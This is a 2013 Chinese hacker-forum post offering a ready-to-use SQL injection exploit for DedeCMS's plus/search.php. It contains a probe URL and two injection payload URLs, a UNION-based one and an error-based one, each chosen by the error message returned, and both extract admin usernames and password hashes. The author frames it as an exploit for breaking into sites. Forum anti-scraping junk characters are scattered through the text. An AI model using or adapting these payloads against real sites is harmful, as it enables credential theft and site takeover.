找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1985|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ7 L6 A1 V: t2 A, Z  v

& g1 [! F) F1 h( S% e哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
( j- @/ m3 g- O* |: @# C
, [6 x6 }. x: v/ t* |! j既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
. W! k* B. k& A# H$ c  @
0 |, G( d- K0 L5 K8 U% W9 x( a- @我一般是这样测试的:
/ R! ^8 s9 t4 P4 {, ], S9 I$ t
: \5 Z2 d+ {: p$ i# X3 _4 Y提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a  V) q) ?9 T4 v  H+ n' ]1 p

& @& u! u/ `8 _! C' x- r0 ?转载不加作者名的没JJ
8 L! F( F. p# T( a% P- {$ p9 O) t
作者:鬼哥8 x% ?3 J9 W- t$ V
3 Z3 |. M6 @: Q4 P! B
4 Z# m  g6 N9 K+ Z: r/ L& D1 P: v
+ `$ z; D) @+ S/ y8 d& E- ^
看结果如果提示
7 L8 t5 F' g, ^( S, C3 K( T4 Z$ T$ f  L
Safe Alert: Request Error step 2 !
/ X; \9 L, u0 [& Q  @2 S8 R. i$ |5 b# q  r
那么直接用下面的exp4 L1 Y! [+ g+ ^5 P0 D  |
. J9 R  I0 i3 ^9 X) ^/ p5 S2 M" t
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a0 x0 J. H4 K1 y7 B

1 i; C7 l) g3 A% |/ n- i# V# z" e  c0 G& v
看结果如果提示' O  s7 S0 Z- P% j! S  R' R' v

& \/ ?) r+ u3 Z9 G. p7 VSafe Alert: Request Error step 1 !
* \1 }0 D+ D/ Z! R; u
. i2 E6 J* w! l) h% A那么直接用下面的exp
7 D/ |" z8 ?, |# k6 s! x' q, m4 I* }  G+ R+ E0 w
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a/ P9 \, Q6 B4 [7 |

* j' `. U3 _& F& u2 j$ z. A; U8 `
! n$ b5 ^0 J9 w& l* h+ o- Q# j如果正常显示证明漏洞不存在了。+ _6 _7 U/ ]* W9 X2 g# N

' x" {! s) c' }8 K转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表